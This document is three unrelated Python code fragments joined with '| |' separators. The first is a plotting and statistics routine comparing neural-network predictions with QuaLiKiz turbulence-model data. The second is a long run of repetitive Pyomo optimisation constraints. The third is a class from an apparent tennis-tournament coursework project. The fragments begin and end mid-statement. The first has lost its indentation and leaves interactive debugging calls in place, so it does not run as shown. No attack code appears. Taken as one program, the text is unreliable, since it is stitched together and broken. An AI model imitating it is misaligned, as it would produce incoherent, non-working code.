pre_thresh = x[x <= thresh2]
ax1.plot(pre_thresh, np.zeros_like(pre_thresh), c='gray', linestyle='dashed')
post_thresh = x[x > thresh2]
se = slice_.loc[target_names]
se.index = se.index.droplevel()
se = se.loc[se.index > thresh2].dropna()
a = sc.optimize.curve_fit(lambda x, a: a * x, se.index-thresh2, se.values)[0][0]
ax1.plot(post_thresh, a * (post_thresh-thresh2), c='gray', linestyle='dashed')
# 13.7 µs ± 1.1 µs per loop (mean ± std. dev. of 7 runs, 100000 loops each)
if unsafe:
slice_list = [np.full_like(x, val) for val in index]
slicedim_idx = np.nonzero(list(nns.values())[0]._feature_names.values == slicedim)[0][0]
slice_list.insert(slicedim_idx, x)
else:
slice_dict = {name: np.full_like(x, val) for name, val in zip(df.index.names, index)}
slice_dict[slicedim] = x
# Plot target points
if settings['plot'] and settings['plot_slice']:
table = ax2.table(cellText=[[nameconvert[name] for name in df.index.names],
['{:.2f}'.format(xx) for xx in index]],cellLoc='center')
table.auto_set_font_size(False)
table.scale(1, 1.5)
#table.set_fontsize(20)
ax2.axis('tight')
ax2.axis('off')
#fig.subplots_adjust(bottom=0.2, transform=ax1.transAxes)
# Plot nn lines
nn_preds = np.ndarray([x.shape[0], 0])
for ii, (nn_index, nn) in enumerate(nns.items()):
if all(['ef' in name for name in nn._target_names]):
clip_low = True
low_bound = np.zeros((len(nn._target_names), 1))
#high_bound = np.full((len(nn._target_names), 1), np.inf)
clip_high = False
high_bound = None
elif all(['pf' in name for name in nn._target_names]):
#raise NotImplementedError('Particle bounds')
clip_low = False
low_bound = np.full((len(nn._target_names), 1), -80)
clip_high = False
high_bound = np.full((len(nn._target_names), 1), 80)
else:
clip_low = False
low_bound = None
clip_high = False
high_bound = None
print('Mixed target!')
embed()
print('Weird stuff')
if unsafe:
nn_pred = nn.get_output(np.array(slice_list).T, clip_low=clip_low, low_bound=low_bound, clip_high=clip_high, high_bound=high_bound, safe=not unsafe, output_pandas=False)
else:
nn_pred = nn.get_output(pd.DataFrame(slice_dict), clip_low=clip_low, low_bound=low_bound, clip_high=clip_high, high_bound=high_bound, safe=not unsafe, output_pandas=True).values
nn_preds = np.concatenate([nn_preds, nn_pred], axis=1)
if settings['plot'] and settings['plot_nns']:
lines = []
if style == 'duo':
labels = np.repeat([nn.label for nn in nns.values()], 2)
for ii in range(0, nn_preds.shape[1], 2):
lines.append(ax1.plot(x, nn_preds[:, ii], label=labels[ii])[0])
lines.append(ax1.plot(x, nn_preds[:, ii+1], label=labels[ii+1], c=lines[-1].get_color(), linestyle='dashed')[0])
else:
for ii, (nn, row) in enumerate(zip(nns.values(), nn_preds.T)):
pass
lines.append(ax1.plot(x, row, label=nn.label)[0])
matrix_style = False
if matrix_style:
thresh_i = (np.arange(nn_preds.shape[1]),nn_preds.shape[0] - 1 - (nn_preds[::-1,:]==0).argmax(0))[1]
thresh = x[thresh_i]
thresh[thresh == x[-1]] = np.nan
else:
for ii, row in enumerate(nn_preds.T):
try:
if row[-1] == 0:
thresh_nn[ii] = np.nan
else:
thresh_i = thresh_nn_i[ii] = np.where(np.diff(np.sign(row)))[0][-1]
thresh_nn[ii] = x[thresh_i]
except IndexError:
thresh_nn[ii] = np.nan
if settings['plot'] and settings['plot_threshlines']:
for ii, row in enumerate(thresh_nn):
ax1.axvline(row, c=lines[ii].get_color(), linestyle='dotted')
if settings['debug']:
print('network ', ii, 'threshold ', row)
if matrix_style:
masked = np.ma.masked_where(x[:, np.newaxis] > thresh, nn_preds)
#popback_i = (masked.shape[0] - 1 - (masked[::1,:]!=0)).argmax(0)
popback_i = masked.shape[0] - 1 - (masked.shape[0] - 1 - (masked[::-1,:]!=0)).argmin(0)
popback = x[popback_i]
popback[popback == x[-1]] = np.nan
else:
for ii, row in enumerate(nn_preds.T):
if not np.isnan(thresh_nn[ii]):
try:
popback_i = np.flatnonzero(row[:thresh_nn_i[ii]])
popbacks[ii] = x[popback_i[-1]]
except (IndexError):
popbacks[ii] = np.nan
else:
popbacks[ii] = np.nan
# 5.16 µs ± 188 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)
wobble = np.abs(np.diff(nn_preds, n=2,axis=0))
wobble_unstab = np.array([np.mean(col[ind:]) for ind, col in zip(thresh_nn_i + 1, wobble.T)])
wobble_tot = np.mean(wobble, axis=0)
if settings['plot'] and settings['plot_pop']:
thresh2_misses = thresh_nn - thresh2
thresh2_popback = popbacks - thresh2
slice_stats = np.array([thresh2_misses, thresh2_popback, np.log10(wobble_tot), np.log10(wobble_unstab)]).T
slice_strings = np.array(['{:.1f}'.format(xx) for xx in slice_stats.reshape(slice_stats.size)])
slice_strings = slice_strings.reshape(slice_stats.shape)
slice_strings = np.insert(slice_strings, 0, ['thre_mis', 'pop_mis', 'wobble_tot', 'wobble_unstb'], axis=0)
table = ax3.table(cellText=slice_strings, loc='center')
table.auto_set_font_size(False)
ax3.axis('tight')
ax3.axis('off')
if settings['debug']:
print(slice_stats.flatten())
if settings['plot']:
if settings['plot_zerocolors']:
color = target.copy()
color[(target == 0) & (maxgam == 0)] = 'green'
color[(target != 0) & (maxgam == 0)] = 'red'
color[(target == 0) & (maxgam != 0)] = 'magenta'
color[(target != 0) & (maxgam != 0)] = 'blue'
else:
color='blue'
if settings['hide_qualikiz']:
color='white'
zorder=1
label=''
else:
zorder=1000
label = 'QuaLiKiz'
#label = 'Turbulence model'
#label=''
markers = ['x', '+']
for column, marker in zip(target, markers):
ax1.scatter(feature[column != 0],
column[column != 0], c=color, label=label, marker=marker, zorder=zorder)
ax1.scatter(feature[column==0],
column[column==0], edgecolors=color, marker='o', facecolors='none', zorder=zorder)
# Plot regression
if settings['plot'] and settings['plot_thresh1line'] and not np.isnan(thresh1):
#plot_min = ax1.get_ylim()[0]
plot_min = -0.1
x_plot = x[(thresh_pred > plot_min) & (thresh_pred < ax1.get_ylim()[1])]
y_plot = thresh_pred[(thresh_pred > plot_min) & (thresh_pred < ax1.get_ylim()[1])]
ax1.plot(x_plot, y_plot, c='gray', linestyle='dotted')
ax1.plot(x[x< thresh1], np.zeros_like(x[x< thresh1]), c='gray', linestyle='dotted')
#ax1.axvline(thresh1, c='black', linestyle='dotted')
slice_res = np.array([thresh_nn, popbacks, wobble_tot, wobble_unstab]).T
if settings['plot']:
ax1.legend()
ax1.set_ylim(bottom=min(ax1.get_ylim()[0], 0))
plt.show()
fig.savefig('slice.pdf', format='pdf', bbox_inches='tight')
qlk_data = pd.DataFrame(target.T, columns=target_names, index=feature)
cols = pd.MultiIndex.from_product([[nn.label for nn in nns.values()], target_names])
nn_data = pd.DataFrame(nn_preds, columns=cols)
nn_data.index = x
nn_data.index.name = feature.name
slice_data = pd.Series(dict(zip(df.index.names, index)))
slice_latex = (' {!s} &' * len(df.index.names)).format(*[nameconvert[name] for name in df.index.names]).strip(' &')
slice_latex += ('\\\\\n' + ' {:.2f} &' * len(index)).format(*index).strip(' &')
embed()
plt.close(fig)
return (0, thresh2, slice_res.flatten())
#sliced += 1
#if sliced % 1000 == 0:
# print(sliced, 'took ', time.time() - starttime, ' seconds')
def extract_stats(totstats, style):
df = totstats.copy()
df = df.reorder_levels([2,0,1], axis=1)
results = pd.DataFrame()
for relabs, measure in zip(['rel', 'abs'], ['thresh', 'pop']):
df2 = df[measure]
qlk_data = df2['QLK']
network_data = df2.drop('QLK', axis=1)
if relabs == 'rel':
mis = network_data.subtract(qlk_data, level=1).divide(qlk_data, level=1)
elif relabs == 'abs':
mis = network_data.subtract(qlk_data, level=1)
quant1 = 0.025
quant2 = 1 - quant1
quant = mis.quantile([quant1, quant2])
results['_'.join([measure, relabs, 'mis', 'median'])] = mis.median()
results['_'.join([measure, relabs, 'mis', '95width'])] = quant.loc[quant2] - quant.loc[quant1]
results['_'.join(['no', measure, 'frac'])] = mis.isnull().sum() / len(mis)
results['wobble_unstab'] = df['wobble_unstab'].mean()
results['wobble_tot'] = df['wobble_tot'].mean()
if style == 'duo':
duo_results = pd.DataFrame()
measure = 'thresh'
df2 = df[measure]
network_data = df2.drop('QLK', axis=1)
network_data = network_data.reorder_levels([1, 0], axis=1)
efelike_name = network_data.columns[1][0]
efilike_name = network_data.columns[0][0]
mis = network_data[efilike_name] - network_data[efelike_name]
quant = mis.quantile([quant1, quant2])
duo_results['dual_thresh_mismatch_median'] = mis.median()
duo_results['dual_thresh_mismatch_95width'] = quant.loc[quant2] - quant.loc[quant1]
duo_results['no_dual_thresh_frac'] = mis.isnull().sum() / len(mis)
else:
duo_results = pd.DataFrame()
return results, duo_results
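# Note on the summary columns produced above: with quant1 = 0.025 the reported
# '95width' is the spread between the 2.5% and 97.5% quantiles of the mismatch,
# i.e. the width of the central 95% of the networks' threshold / popback errors.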
def extract_nn_stats(results, duo_results, nns, frac, submit_to_nndb=False):
db.connect()
| |
= Constraint(expr=-m.x2502*m.x1016 + m.x1767 == 0)
m.c1901 = Constraint(expr=-m.x2502*m.x1021 + m.x1772 == 0)
m.c1902 = Constraint(expr=-m.x2502*m.x1026 + m.x1777 == 0)
m.c1903 = Constraint(expr=-m.x2502*m.x1031 + m.x1782 == 0)
m.c1904 = Constraint(expr=-m.x2502*m.x1036 + m.x1787 == 0)
m.c1905 = Constraint(expr=-m.x2502*m.x1041 + m.x1792 == 0)
m.c1906 = Constraint(expr=-m.x2502*m.x1046 + m.x1797 == 0)
m.c1907 = Constraint(expr=-m.x2502*m.x1051 + m.x1802 == 0)
m.c1908 = Constraint(expr=-m.x2502*m.x1056 + m.x1807 == 0)
m.c1909 = Constraint(expr=-m.x2502*m.x1061 + m.x1812 == 0)
m.c1910 = Constraint(expr=-m.x2502*m.x1066 + m.x1817 == 0)
m.c1911 = Constraint(expr=-m.x2502*m.x1071 + m.x1822 == 0)
m.c1912 = Constraint(expr=-m.x2502*m.x1076 + m.x1827 == 0)
m.c1913 = Constraint(expr=-m.x2502*m.x1081 + m.x1832 == 0)
m.c1914 = Constraint(expr=-m.x2502*m.x1086 + m.x1837 == 0)
m.c1915 = Constraint(expr=-m.x2502*m.x1091 + m.x1842 == 0)
m.c1916 = Constraint(expr=-m.x2502*m.x1096 + m.x1847 == 0)
m.c1917 = Constraint(expr=-m.x2502*m.x1101 + m.x1852 == 0)
m.c1918 = Constraint(expr=-m.x2502*m.x1106 + m.x1857 == 0)
m.c1919 = Constraint(expr=-m.x2502*m.x1111 + m.x1862 == 0)
m.c1920 = Constraint(expr=-m.x2502*m.x1116 + m.x1867 == 0)
m.c1921 = Constraint(expr=-m.x2502*m.x1121 + m.x1872 == 0)
m.c1922 = Constraint(expr=-m.x2502*m.x1126 + m.x1877 == 0)
m.c1923 = Constraint(expr=-m.x2502*m.x1131 + m.x1882 == 0)
m.c1924 = Constraint(expr=-m.x2502*m.x1136 + m.x1887 == 0)
m.c1925 = Constraint(expr=-m.x2502*m.x1141 + m.x1892 == 0)
m.c1926 = Constraint(expr=-m.x2502*m.x1146 + m.x1897 == 0)
m.c1927 = Constraint(expr=-m.x2502*m.x1151 + m.x1902 == 0)
m.c1928 = Constraint(expr=-m.x2502*m.x1156 + m.x1907 == 0)
m.c1929 = Constraint(expr=-m.x2502*m.x1161 + m.x1912 == 0)
m.c1930 = Constraint(expr=-m.x2502*m.x1166 + m.x1917 == 0)
m.c1931 = Constraint(expr=-m.x2502*m.x1171 + m.x1922 == 0)
m.c1932 = Constraint(expr=-m.x2502*m.x1176 + m.x1927 == 0)
m.c1933 = Constraint(expr=-m.x2502*m.x1181 + m.x1932 == 0)
m.c1934 = Constraint(expr=-m.x2502*m.x1186 + m.x1937 == 0)
m.c1935 = Constraint(expr=-m.x2502*m.x1191 + m.x1942 == 0)
m.c1936 = Constraint(expr=-m.x2502*m.x1196 + m.x1947 == 0)
m.c1937 = Constraint(expr=-m.x2502*m.x1201 + m.x1952 == 0)
m.c1938 = Constraint(expr=-m.x2502*m.x1206 + m.x1957 == 0)
m.c1939 = Constraint(expr=-m.x2502*m.x1211 + m.x1962 == 0)
m.c1940 = Constraint(expr=-m.x2502*m.x1216 + m.x1967 == 0)
m.c1941 = Constraint(expr=-m.x2502*m.x1221 + m.x1972 == 0)
m.c1942 = Constraint(expr=-m.x2502*m.x1226 + m.x1977 == 0)
m.c1943 = Constraint(expr=-m.x2502*m.x1231 + m.x1982 == 0)
m.c1944 = Constraint(expr=-m.x2502*m.x1236 + m.x1987 == 0)
m.c1945 = Constraint(expr=-m.x2502*m.x1241 + m.x1992 == 0)
m.c1946 = Constraint(expr=-m.x2502*m.x1246 + m.x1997 == 0)
m.c1947 = Constraint(expr=-m.x2502*m.x1251 + m.x2002 == 0)
m.c1948 = Constraint(expr=-m.x2502*m.x1256 + m.x2007 == 0)
m.c1949 = Constraint(expr=-m.x2502*m.x1261 + m.x2012 == 0)
m.c1950 = Constraint(expr=-m.x2502*m.x1266 + m.x2017 == 0)
m.c1951 = Constraint(expr=-m.x2502*m.x1271 + m.x2022 == 0)
m.c1952 = Constraint(expr=-m.x2502*m.x1276 + m.x2027 == 0)
m.c1953 = Constraint(expr=-m.x2502*m.x1281 + m.x2032 == 0)
m.c1954 = Constraint(expr=-m.x2502*m.x1286 + m.x2037 == 0)
m.c1955 = Constraint(expr=-m.x2502*m.x1291 + m.x2042 == 0)
m.c1956 = Constraint(expr=-m.x2502*m.x1296 + m.x2047 == 0)
m.c1957 = Constraint(expr=-m.x2502*m.x1301 + m.x2052 == 0)
m.c1958 = Constraint(expr=-m.x2502*m.x1306 + m.x2057 == 0)
m.c1959 = Constraint(expr=-m.x2502*m.x1311 + m.x2062 == 0)
m.c1960 = Constraint(expr=-m.x2502*m.x1316 + m.x2067 == 0)
m.c1961 = Constraint(expr=-m.x2502*m.x1321 + m.x2072 == 0)
m.c1962 = Constraint(expr=-m.x2502*m.x1326 + m.x2077 == 0)
m.c1963 = Constraint(expr=-m.x2502*m.x1331 + m.x2082 == 0)
m.c1964 = Constraint(expr=-m.x2502*m.x1336 + m.x2087 == 0)
m.c1965 = Constraint(expr=-m.x2502*m.x1341 + m.x2092 == 0)
m.c1966 = Constraint(expr=-m.x2502*m.x1346 + m.x2097 == 0)
m.c1967 = Constraint(expr=-m.x2502*m.x1351 + m.x2102 == 0)
m.c1968 = Constraint(expr=-m.x2502*m.x1356 + m.x2107 == 0)
m.c1969 = Constraint(expr=-m.x2502*m.x1361 + m.x2112 == 0)
m.c1970 = Constraint(expr=-m.x2502*m.x1366 + m.x2117 == 0)
m.c1971 = Constraint(expr=-m.x2502*m.x1371 + m.x2122 == 0)
m.c1972 = Constraint(expr=-m.x2502*m.x1376 + m.x2127 == 0)
m.c1973 = Constraint(expr=-m.x2502*m.x1381 + m.x2132 == 0)
m.c1974 = Constraint(expr=-m.x2502*m.x1386 + m.x2137 == 0)
m.c1975 = Constraint(expr=-m.x2502*m.x1391 + m.x2142 == 0)
m.c1976 = Constraint(expr=-m.x2502*m.x1396 + m.x2147 == 0)
m.c1977 = Constraint(expr=-m.x2502*m.x1401 + m.x2152 == 0)
m.c1978 = Constraint(expr=-m.x2502*m.x1406 + m.x2157 == 0)
m.c1979 = Constraint(expr=-m.x2502*m.x1411 + m.x2162 == 0)
m.c1980 = Constraint(expr=-m.x2502*m.x1416 + m.x2167 == 0)
m.c1981 = Constraint(expr=-m.x2502*m.x1421 + m.x2172 == 0)
m.c1982 = Constraint(expr=-m.x2502*m.x1426 + m.x2177 == 0)
m.c1983 = Constraint(expr=-m.x2502*m.x1431 + m.x2182 == 0)
m.c1984 = Constraint(expr=-m.x2502*m.x1436 + m.x2187 == 0)
m.c1985 = Constraint(expr=-m.x2502*m.x1441 + m.x2192 == 0)
m.c1986 = Constraint(expr=-m.x2502*m.x1446 + m.x2197 == 0)
m.c1987 = Constraint(expr=-m.x2502*m.x1451 + m.x2202 == 0)
m.c1988 = Constraint(expr=-m.x2502*m.x1456 + m.x2207 == 0)
m.c1989 = Constraint(expr=-m.x2502*m.x1461 + m.x2212 == 0)
m.c1990 = Constraint(expr=-m.x2502*m.x1466 + m.x2217 == 0)
m.c1991 = Constraint(expr=-m.x2502*m.x1471 + m.x2222 == 0)
m.c1992 = Constraint(expr=-m.x2502*m.x1476 + m.x2227 == 0)
m.c1993 = Constraint(expr=-m.x2502*m.x1481 + m.x2232 == 0)
m.c1994 = Constraint(expr=-m.x2502*m.x1486 + m.x2237 == 0)
m.c1995 = Constraint(expr=-m.x2502*m.x1491 + m.x2242 == 0)
m.c1996 = Constraint(expr=-m.x2502*m.x1496 + m.x2247 == 0)
m.c1997 = Constraint(expr=-m.x2502*m.x1501 + m.x2252 == 0)
m.c1998 = Constraint(expr=-m.x2502*m.x1506 + m.x2257 == 0)
m.c1999 = Constraint(expr=-m.x2502*m.x1511 + m.x2262 == 0)
m.c2000 = Constraint(expr=-m.x2502*m.x1516 + m.x2267 == 0)
m.c2001 = Constraint(expr=-m.x2502*m.x1521 + m.x2272 == 0)
m.c2002 = Constraint(expr=-m.x2502*m.x1526 + m.x2277 == 0)
m.c2003 = Constraint(expr=-m.x2502*m.x1531 + m.x2282 == 0)
m.c2004 = Constraint(expr=-m.x2502*m.x1536 + m.x2287 == 0)
m.c2005 = Constraint(expr=-m.x2502*m.x1541 + m.x2292 == 0)
m.c2006 = Constraint(expr=-m.x2502*m.x1546 + m.x2297 == 0)
m.c2007 = Constraint(expr=-m.x2502*m.x1551 + m.x2302 == 0)
m.c2008 = Constraint(expr=-m.x2502*m.x1556 + m.x2307 == 0)
m.c2009 = Constraint(expr=-m.x2502*m.x1561 + m.x2312 == 0)
m.c2010 = Constraint(expr=-m.x2502*m.x1566 + m.x2317 == 0)
m.c2011 = Constraint(expr=-m.x2502*m.x1571 + m.x2322 == 0)
m.c2012 = Constraint(expr=-m.x2502*m.x1576 + m.x2327 == 0)
m.c2013 = Constraint(expr=-m.x2502*m.x1581 + m.x2332 == 0)
m.c2014 = Constraint(expr=-m.x2502*m.x1586 + m.x2337 == 0)
m.c2015 = Constraint(expr=-m.x2502*m.x1591 + m.x2342 == 0)
m.c2016 = Constraint(expr=-m.x2502*m.x1596 + m.x2347 == 0)
m.c2017 = Constraint(expr=-m.x2502*m.x1601 + m.x2352 == 0)
m.c2018 = Constraint(expr=-m.x2502*m.x1606 + m.x2357 == 0)
m.c2019 = Constraint(expr=-m.x2502*m.x1611 + m.x2362 == 0)
m.c2020 = Constraint(expr=-m.x2502*m.x1616 + m.x2367 == 0)
m.c2021 = Constraint(expr=-m.x2502*m.x1621 + m.x2372 == 0)
m.c2022 = Constraint(expr=-m.x2502*m.x1626 + m.x2377 == 0)
m.c2023 = Constraint(expr=-m.x2502*m.x1631 + m.x2382 == 0)
m.c2024 = Constraint(expr=-m.x2502*m.x1636 + m.x2387 == 0)
m.c2025 = Constraint(expr=-m.x2502*m.x1641 + m.x2392 == 0)
m.c2026 = Constraint(expr=-m.x2502*m.x1646 + m.x2397 == 0)
m.c2027 = Constraint(expr=-m.x2502*m.x1651 + m.x2402 == 0)
m.c2028 = Constraint(expr=-m.x2502*m.x1656 + m.x2407 == 0)
m.c2029 = Constraint(expr=-m.x2502*m.x1661 + m.x2412 == 0)
m.c2030 = Constraint(expr=-m.x2502*m.x1666 + m.x2417 == 0)
m.c2031 = Constraint(expr=-m.x2502*m.x1671 + m.x2422 == 0)
m.c2032 = Constraint(expr=-m.x2502*m.x1676 + m.x2427 == 0)
m.c2033 = Constraint(expr=-m.x2502*m.x1681 + m.x2432 == 0)
m.c2034 = Constraint(expr=-m.x2502*m.x1686 + m.x2437 == 0)
m.c2035 = Constraint(expr=-m.x2502*m.x1691 + m.x2442 == 0)
m.c2036 = Constraint(expr=-m.x2502*m.x1696 + m.x2447 == 0)
m.c2037 = Constraint(expr=-m.x2502*m.x1701 + m.x2452 == 0)
m.c2038 = Constraint(expr=-m.x2502*m.x1706 + m.x2457 == 0)
m.c2039 = Constraint(expr=-m.x2502*m.x1711 + m.x2462 == 0)
m.c2040 = Constraint(expr=-m.x2502*m.x1716 + m.x2467 == 0)
m.c2041 = Constraint(expr=-m.x2502*m.x1721 + m.x2472 == 0)
m.c2042 = Constraint(expr=-m.x2502*m.x1726 + m.x2477 == 0)
m.c2043 = Constraint(expr=-m.x2502*m.x1731 + m.x2482 == 0)
m.c2044 = Constraint(expr=-m.x2502*m.x1736 + m.x2487 == 0)
m.c2045 = Constraint(expr=-m.x2502*m.x1741 + m.x2492 == 0)
m.c2046 = Constraint(expr=-m.x2502*m.x1746 + m.x2497 == 0)
m.c2047 = Constraint(expr=-(m.x2503*m.x1001 - (m.x2504 + m.x2505)*m.x1003 + m.x2506*m.x1005) + m.x1753 == 0)
m.c2048 = Constraint(expr=-(m.x2503*m.x1006 - (m.x2504 + m.x2505)*m.x1008 + m.x2506*m.x1010) + m.x1758 == 0)
m.c2049 = Constraint(expr=-(m.x2503*m.x1011 - (m.x2504 + m.x2505)*m.x1013 + m.x2506*m.x1015) + m.x1763 == 0)
m.c2050 = Constraint(expr=-(m.x2503*m.x1016 - (m.x2504 + m.x2505)*m.x1018 + m.x2506*m.x1020) + m.x1768 == 0)
m.c2051 = Constraint(expr=-(m.x2503*m.x1021 - (m.x2504 + m.x2505)*m.x1023 + m.x2506*m.x1025) + m.x1773 == 0)
m.c2052 = Constraint(expr=-(m.x2503*m.x1026 - (m.x2504 + m.x2505)*m.x1028 + m.x2506*m.x1030) + m.x1778 == 0)
m.c2053 = Constraint(expr=-(m.x2503*m.x1031 - (m.x2504 + m.x2505)*m.x1033 + m.x2506*m.x1035) + m.x1783 == 0)
m.c2054 = Constraint(expr=-(m.x2503*m.x1036 - (m.x2504 + m.x2505)*m.x1038 + m.x2506*m.x1040) + m.x1788 == 0)
m.c2055 = Constraint(expr=-(m.x2503*m.x1041 - (m.x2504 + m.x2505)*m.x1043 + m.x2506*m.x1045) + m.x1793 == 0)
m.c2056 = Constraint(expr=-(m.x2503*m.x1046 - (m.x2504 + m.x2505)*m.x1048 + m.x2506*m.x1050) + m.x1798 == 0)
m.c2057 = Constraint(expr=-(m.x2503*m.x1051 - (m.x2504 + m.x2505)*m.x1053 + m.x2506*m.x1055) + m.x1803 == 0)
m.c2058 = Constraint(expr=-(m.x2503*m.x1056 - (m.x2504 + m.x2505)*m.x1058 + m.x2506*m.x1060) + m.x1808 == 0)
m.c2059 = Constraint(expr=-(m.x2503*m.x1061 - (m.x2504 + m.x2505)*m.x1063 + m.x2506*m.x1065) + m.x1813 == 0)
m.c2060 = Constraint(expr=-(m.x2503*m.x1066 - (m.x2504 + m.x2505)*m.x1068 + m.x2506*m.x1070) + m.x1818 == 0)
m.c2061 = Constraint(expr=-(m.x2503*m.x1071 - (m.x2504 + m.x2505)*m.x1073 + m.x2506*m.x1075) + m.x1823 == 0)
m.c2062 = Constraint(expr=-(m.x2503*m.x1076 - (m.x2504 + m.x2505)*m.x1078 + m.x2506*m.x1080) + m.x1828 == 0)
m.c2063 = Constraint(expr=-(m.x2503*m.x1081 - (m.x2504 + m.x2505)*m.x1083 + m.x2506*m.x1085) + m.x1833 == 0)
m.c2064 = Constraint(expr=-(m.x2503*m.x1086 - (m.x2504 + m.x2505)*m.x1088 + m.x2506*m.x1090) + m.x1838 == 0)
m.c2065 = Constraint(expr=-(m.x2503*m.x1091 - (m.x2504 + m.x2505)*m.x1093 + m.x2506*m.x1095) + m.x1843 == 0)
m.c2066 = Constraint(expr=-(m.x2503*m.x1096 - (m.x2504 + m.x2505)*m.x1098 + m.x2506*m.x1100) + m.x1848 == 0)
m.c2067 = Constraint(expr=-(m.x2503*m.x1101 - (m.x2504 + m.x2505)*m.x1103 + m.x2506*m.x1105) + m.x1853 == 0)
m.c2068 = Constraint(expr=-(m.x2503*m.x1106 - (m.x2504 + m.x2505)*m.x1108 + m.x2506*m.x1110) + m.x1858 == 0)
m.c2069 = Constraint(expr=-(m.x2503*m.x1111 - (m.x2504 + m.x2505)*m.x1113 + m.x2506*m.x1115) + m.x1863 == 0)
m.c2070 = Constraint(expr=-(m.x2503*m.x1116 - (m.x2504 + m.x2505)*m.x1118 + m.x2506*m.x1120) + m.x1868 == 0)
m.c2071 = Constraint(expr=-(m.x2503*m.x1121 - (m.x2504 + m.x2505)*m.x1123 + m.x2506*m.x1125) + m.x1873 == 0)
m.c2072 = Constraint(expr=-(m.x2503*m.x1126 - (m.x2504 + m.x2505)*m.x1128 + m.x2506*m.x1130) + m.x1878 == 0)
m.c2073 = Constraint(expr=-(m.x2503*m.x1131 - (m.x2504 + m.x2505)*m.x1133 + m.x2506*m.x1135) + m.x1883 == 0)
m.c2074 = Constraint(expr=-(m.x2503*m.x1136 - (m.x2504 + m.x2505)*m.x1138 + m.x2506*m.x1140) + m.x1888 == 0)
m.c2075 = Constraint(expr=-(m.x2503*m.x1141 - (m.x2504 + m.x2505)*m.x1143 + m.x2506*m.x1145) + m.x1893 == 0)
m.c2076 = Constraint(expr=-(m.x2503*m.x1146 - (m.x2504 + m.x2505)*m.x1148 + m.x2506*m.x1150) + m.x1898 == 0)
m.c2077 = Constraint(expr=-(m.x2503*m.x1151 - (m.x2504 + m.x2505)*m.x1153 + m.x2506*m.x1155) + m.x1903 == 0)
m.c2078 = Constraint(expr=-(m.x2503*m.x1156 - (m.x2504 + m.x2505)*m.x1158 + m.x2506*m.x1160) + m.x1908 == 0)
m.c2079 = Constraint(expr=-(m.x2503*m.x1161 - (m.x2504 + m.x2505)*m.x1163 + m.x2506*m.x1165) + m.x1913 == 0)
m.c2080 = Constraint(expr=-(m.x2503*m.x1166 | |
"""
# Data Structures and Algorithms - Part B
# Created by <NAME> (16021424)
"""
from tennis import Match
from tennis.Menu import Menu
from tennis.Menu import Builder
from tennis.Colours import Colours
from tools.QuickSort import quick_sort_score as QuickSort
from functools import partial
class MatchGender():
# Variables
game = None
gender = None
parent = None
matches = None
available = None
complete = None
input_file_state = None
pop_player_list = None
# End of Round Variables
complete_winners = None
complete_losers = None
complete_scores = None
def __init__(self, _game, _gender, _parent):
# Set Variables
self.game = _game
self.gender = _gender
self.parent = _parent
self.matches = [ ]
# Set Flags
self.pop_player_list = None
self.available = False
self.complete = False
        self.input_file_state = (self.parent.parent.parent.get_id() == 1)
# End of Round Variables
self.complete_scores = [ ]
self.complete_winners = [ ]
self.complete_losers = [ ]
def add_match(self, match):
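        # Wrap the raw match record in a Match object for this round/gender, track it in self.matches, and return it.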
m = Match.Match(self.game, self.gender, self, match)
self.matches.append(m)
return m
def get_gender(self):
return self.gender
def is_complete(self):
return self.complete
def set_complete(self, state):
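        # Record the completion state, finalise this round, update each player's wins/losses
        # and ranking points, and once every round is complete allocate prize money and mark
        # the tournament as finished.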
self.complete = state
# Finalise this round
self.finalise()
# Check if this tournament for this gender is complete
all_complete = True
for t_round in self.parent.parent.get_rounds():
mg = t_round.get_gender(self.gender)[1]
if(not mg.is_complete()):
all_complete = False
break
# Increase the wins of each winning player
for m in self.get_matches():
if(m.get_winner() == m.player_one):
m.player_one_object.increment_wins(self.parent.parent.get_name())
m.player_two_object.increment_losts(self.parent.parent.get_name())
self.complete_winners.append(m.player_one)
self.complete_losers.append(m.player_two)
elif(m.get_winner() == m.player_two):
m.player_two_object.increment_wins(self.parent.parent.get_name())
m.player_one_object.increment_losts(self.parent.parent.get_name())
self.complete_winners.append(m.player_two)
self.complete_losers.append(m.player_one)
if(self.game.debug):
print("{} now has {} wins.".format(m.player_one, m.player_one_object.get_wins(self.parent.parent.get_name())))
print("{} now has {} wins.".format(m.player_two, m.player_two_object.get_wins(self.parent.parent.get_name())))
# Add Ranking Points to Player Object
player_scores = [ ]
for t_round in self.parent.parent.get_rounds():
# Get Round Data
mg = t_round.get_gender(self.gender)[1]
# Break if Round is incomplete
if(not mg.is_complete()):
break
# Set the scores
for player_score in mg.complete_scores:
player = player_score[0]
score = float(player_score[1])
bonus = float(player_score[2])
# Find Player
player_found = False
i = 0
for p in player_scores:
if(p['player'].get_name() == player):
player_scores[i] = { "score": p['score'] + (score * bonus), "player": self.parent.parent.parent.get_player(player, self.gender) }
player_found = True
i += 1
# Add Player
if(not player_found):
player_scores.append({ "score": (score * bonus), "player": self.parent.parent.parent.get_player(player, self.gender) })
# End Round
if(t_round.get_id() == self.game.settings['round_count']):
i = 0
for p in player_scores:
player_scores[i] = { "score": p['score'] * t_round.parent.get_difficulty(), "player": player_scores[i]['player'] }
i += 1
# Cycle through Player Objects and set their score for this tournament
for p in player_scores:
plyr = p['player']
score = p['score']
plyr.set_score(self.parent.parent.get_name(), score)
# Are all the rounds complete?
if(all_complete):
            # Mark the tournament as complete once every round for both genders is complete
for gender in self.parent.genders:
completely_complete = True
for t_round in self.parent.parent.get_rounds():
mg = t_round.get_gender(gender)[1]
if(not mg.is_complete()):
completely_complete = False
break
# Set Prize Money Values
for t_round in self.parent.parent.get_rounds():
# Get Round Data
mg = t_round.get_gender(self.gender)[1]
# Break if Round is incomplete
if(not mg.is_complete()):
break
# Set the scores
for player_score in mg.complete_scores:
player = player_score[0]
score = float(player_score[1])
# Find Player
player_found = False
i = 0
for p in player_scores:
if(p['player'].get_name() == player):
player_scores[i] = { "score": p['score'] + score, "player": self.parent.parent.parent.get_player(player, self.gender) }
player_found = True
i += 1
# Add Player
if(not player_found):
player_scores.append({ "score": score, "player": self.parent.parent.parent.get_player(player, self.gender) })
                # Rank players by total score and allocate prize money by finishing position
overall_place = 1
in_order = QuickSort(player_scores)
for p in reversed(in_order):
# Variables
player = p['player']
# Set Prize Money Value
player.set_money(self.parent.parent.get_name(), self.parent.parent.prize_money[str(overall_place)] if str(overall_place) in self.parent.parent.prize_money else 0)
overall_place += 1
                # If every round for this gender is complete, mark the whole tournament as finished
if(completely_complete):
self.parent.parent.set_complete(True)
Builder().reload_menu()
else:
if(self.game.debug):
print("Not everything is complete.")
